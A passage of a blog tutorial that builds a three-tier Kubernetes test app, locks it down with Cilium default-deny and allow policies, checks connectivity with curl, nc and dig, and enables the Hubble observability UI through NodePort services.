<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">web</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:1.27-alpine</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">80</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">80</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apps/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Deployment</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">replicas:</span> <span class="hljs-number">1</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">template:</span>
    <span class="hljs-attr">metadata:</span>
      <span class="hljs-attr">labels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">containers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
          <span class="hljs-attr">image:</span> <span class="hljs-string">postgres:15-alpine</span>
          <span class="hljs-attr">env:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">POSTGRES_PASSWORD</span>
              <span class="hljs-attr">value:</span> <span class="hljs-string">pass</span>
          <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">containerPort:</span> <span class="hljs-number">5432</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">pg</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">5432</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f test-app.yaml
</code></pre>
<p>Then run a quick shell in the <code>frontend</code> namespace and test connectivity.</p>
<pre><code class="lang-bash">kubectl run -n frontend <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash

curl -sI http://api.backend.svc.cluster.local
nc -vz postgres.db.svc.cluster.local 5432
dig +short kubernetes.default.svc.cluster.local
</code></pre>
<p>You should see something similar to the following.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Mon, 06 Oct 2025 14:32:10 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.101.1.16) 5432 port [tcp/postgresql] succeeded!
test:~# dig +short kubernetes.default.svc.cluster.local
10.96.0.1
</code></pre>
<p>Everything should work: HTTP to backend, TCP to Postgres, DNS lookups. Cilium enforces nothing yet, so traffic flows freely between namespaces and pods. And our test environment is purring (I guess that is more Calico, but you get the point).</p>
<h3 id="heading-cilium-networkpolicy-primer">Cilium NetworkPolicy Primer</h3>
<p>So now let's see what Cilium's got for its <code>NetworkPolicy</code>. Cilium introduces its own CRD: <code>CiliumNetworkPolicy</code> (CNP). It extends Kubernetes <code>NetworkPolicy</code> with L7 context and identity-based enforcement — meaning it can match flows not only by port and IP, but also by <strong>service name</strong>, <strong>HTTP verb</strong>, or <strong>DNS pattern</strong>.</p>
<p>Here’s the simplest possible CNP: a namespace-scoped default-deny. Save the following as <code>cnp-default-deny.yaml</code>. It uses Cilium’s explicit deny fields (<code>ingressDeny</code> and <code>egressDeny</code>) to ensure traffic is actually blocked.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cnp-default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span>
    <span class="hljs-bullet">-</span> {} 
  <span class="hljs-attr">egressDeny:</span>
    <span class="hljs-bullet">-</span> {}
</code></pre>
<p>Apply it.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-default-deny.yaml
</code></pre>
<p>Now all the same <code>curl</code> or <code>dig</code> commands fail. No ingress, no egress, no DNS. Welcome to zero-trust networking. Insert sad face.</p>
<p>Note that unlike a standard NetworkPolicy, leaving ingress and egress empty in Cilium doesn’t automatically enforce a deny-all posture. Cilium only turns on enforcement when a rule or explicit deny exists. The version we used guarantees both directions are blocked until you start carving out allows.</p>
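<p>For comparison, the equivalent default-deny as a vanilla Kubernetes <code>NetworkPolicy</code> relies on exactly that implicit behavior. Shown as a sketch only; we won’t apply it here:</p>
<pre><code class="lang-yaml">apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny
  namespace: frontend
spec:
  podSelector: {}   # select every pod in the namespace
  policyTypes:      # listing a type with no rules denies that direction
    - Ingress
    - Egress
</code></pre>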
<p>If you’re curious which policies are active, list them.</p>
<pre><code class="lang-bash">kubectl get cnp -n frontend
</code></pre>
<h3 id="heading-observing-without-hubble-more-on-that-later">Observing Without Hubble (More on that later)</h3>
<p>Right now, we’re flying blind. We have no logs, no flow data, just blocked packets. That’s fine; we’ll turn on <strong>Hubble</strong> soon for x-ray-vision-level insight (very cool-kid stuff) into what’s happening under the hood. For now, the takeaway is simple: Cilium enforces deny/allow semantics just like Calico or native <code>NetworkPolicy</code>.</p>
<p>But Cilium can express policies with far more context than ports: for example, an egress rule that allows DNS lookups through CoreDNS, matching on protocol and even query patterns. We’ll come back to this when we enable Hubble.</p>
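<p>As a taste of what that can look like (a sketch only; don’t apply it yet), a DNS-aware egress rule nests <code>rules.dns</code> under the port match. The pattern below is illustrative:</p>
<pre><code class="lang-yaml">egress:
  - toEndpoints:
      - matchLabels:
          k8s:io.kubernetes.pod.namespace: kube-system
          k8s:k8s-app: kube-dns
    toPorts:
      - ports:
          - port: "53"
            protocol: ANY
        rules:
          dns:
            # only permit lookups for in-cluster service names
            - matchPattern: "*.svc.cluster.local"
</code></pre>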
<hr />
<h2 id="heading-rebuilding-the-three-tier-flows-under-cilium">Rebuilding the Three-Tier Flows Under Cilium</h2>
<p>Now that Cilium is enforcing properly, we can mirror the same three-hop app flows we created earlier: <strong>frontend → backend → database</strong>, plus DNS egress. This will give us a clean baseline before enabling Hubble and exploring L7.</p>
<h3 id="heading-1-deny-all-in-each-namespace">1. Deny-All in Each Namespace</h3>
<p>Save the following as <code>cnp-deny-all.yaml</code>. This will shut down all traffic in and out for each of our three namespaces, not just <code>frontend</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span> [ {} ]
  <span class="hljs-attr">egressDeny:</span>  [ {} ]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span> [ {} ]
  <span class="hljs-attr">egressDeny:</span>  [ {} ]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">default-deny</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">ingressDeny:</span> [ {} ]
  <span class="hljs-attr">egressDeny:</span>  [ {} ]
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-deny-all.yaml
</code></pre>
<h3 id="heading-2-allow-dns-egress-globally">2. Allow DNS Egress Globally</h3>
<p>Save the following as <code>ccnp-allow-dns.yaml</code>. This allows CoreDNS itself to reach the API server and resolve against upstream DNS. Notice this is a <code>CiliumClusterwideNetworkPolicy</code>: nothing special, it's simply not namespaced and adds <code>nodeSelector</code> support.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumClusterwideNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-coredns-egress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
      <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEntities:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">kube-apiserver</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"443"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEntities:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">world</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f ccnp-allow-dns.yaml
</code></pre>
<h3 id="heading-3-allow-dns-egress-per-namespace">3. Allow DNS Egress per Namespace</h3>
<p>We'll need to also allow each namespace DNS egress. Save the following as <code>cnp-ns-dns.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
            <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
            <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-dns-egress</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">k8s:io.kubernetes.pod.namespace:</span> <span class="hljs-string">kube-system</span>
            <span class="hljs-attr">k8s:k8s-app:</span> <span class="hljs-string">kube-dns</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"53"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply as usual.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-ns-dns.yaml
</code></pre>
<h3 id="heading-4-app-flows-frontend-backend-db">4. App Flows: Frontend → Backend → DB</h3>
<p>Save the following as <code>cnp-front-to-back.yaml</code>. This will allow our frontend to reach the backend.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">front-egress-to-back</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">backend</span>
            <span class="hljs-attr">"k8s:app":</span> <span class="hljs-string">api</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">back-ingress-from-front</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">fromEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">frontend</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>Save the following as <code>cnp-back-to-db.yaml</code>. This will allow our backend to reach the database.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">back-egress-to-db</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">db</span>
            <span class="hljs-attr">"k8s:app":</span> <span class="hljs-string">postgres</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"5432"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">db-ingress-from-back</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:app:</span> <span class="hljs-string">postgres</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">fromEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">backend</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"5432"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
</code></pre>
<p>And apply to wrap up all the policies.</p>
<pre><code class="lang-bash">kubectl apply -f cnp-front-to-back.yaml
kubectl apply -f cnp-back-to-db.yaml
</code></pre>
<h3 id="heading-5-quick-tests">5. Quick Tests</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Frontend → Backend (HTTP)</span>
matt@ciliumcontrolplane:~/blog$ kubectl -n frontend run app --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
app:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Mon, 06 Oct 2025 21:49:48 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

# Backend → DB (Postgres)
matt@ciliumcontrolplane:~/blog$ kubectl -n backend run app --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
app:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.101.1.16) 5432 port [tcp/postgresql] succeeded!
</code></pre>
<p>I think I got all of that right, but let me know if something is off. This is all pretty similar to what we've done before, but we've got to cover the bases. With traffic restored for the intended paths, our app is looking nice and tidy. Onward and upward.</p>
<hr />
<h2 id="heading-lighting-up-hubble">Lighting Up Hubble</h2>
<p>We’ve got our service boundaries locked down. Now it’s time to actually <em>see</em> them in action.  That’s where <strong>Hubble</strong> comes in: Cilium’s built-in observability layer that turns packet-level noise into readable flow context. And it just works. </p>
<p>Hubble runs as a <strong>Relay</strong> (for aggregation) and an optional <strong>UI</strong> (for pretty visuals).<br />We’ll use both.</p>
<h3 id="heading-step-1-enable-hubble">Step 1: Enable Hubble</h3>
<p>If you didn’t enable it during install, it’s just one command.</p>
<pre><code class="lang-bash">cilium hubble <span class="hljs-built_in">enable</span> --ui
</code></pre>
<p>Then verify the Hubble pods are running in <code>kube-system</code>.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~/blog$ kubectl get po -n kube-system | grep hubble
hubble-relay-cdd887546-nxcs2                 1/1     Running   0          16h
hubble-ui-69d69b64cf-s6rj7                   2/2     Running   0          16h
</code></pre>
<p>This deploys:</p>
<ul>
<li><p><code>hubble-relay</code> – the data service that aggregates flow logs from each Cilium agent</p>
</li>
<li><p><code>hubble-ui</code> – a lightweight web frontend</p>
</li>
</ul>
<h3 id="heading-step-2-access-the-hubble-ui">Step 2: Access the Hubble UI</h3>
<p>Expose it locally (for your Mac in this case) with a <code>NodePort</code>, which makes it accessible directly from your control plane node’s IP. Patching the existing service won’t stick, though: the operator reconciles it right back. This has happened with many tools, so let’s just create our own services and leave the managed ones undisturbed. Save the following as <code>hubble-service.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">hubble-ui-nodeport</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kube-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">hubble-ui</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">http</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">8081</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8081</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">nodePort:</span> <span class="hljs-number">31080</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">hubble-relay-nodeport</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kube-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">hubble-relay</span>
  <span class="hljs-attr">ports:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">relay</span>
      <span class="hljs-attr">port:</span> <span class="hljs-number">8090</span>
      <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8090</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">nodePort:</span> <span class="hljs-number">31083</span>
</code></pre>
<p>And apply.</p>
<pre><code class="lang-bash">kubectl apply -f hubble-service.yaml
</code></pre>
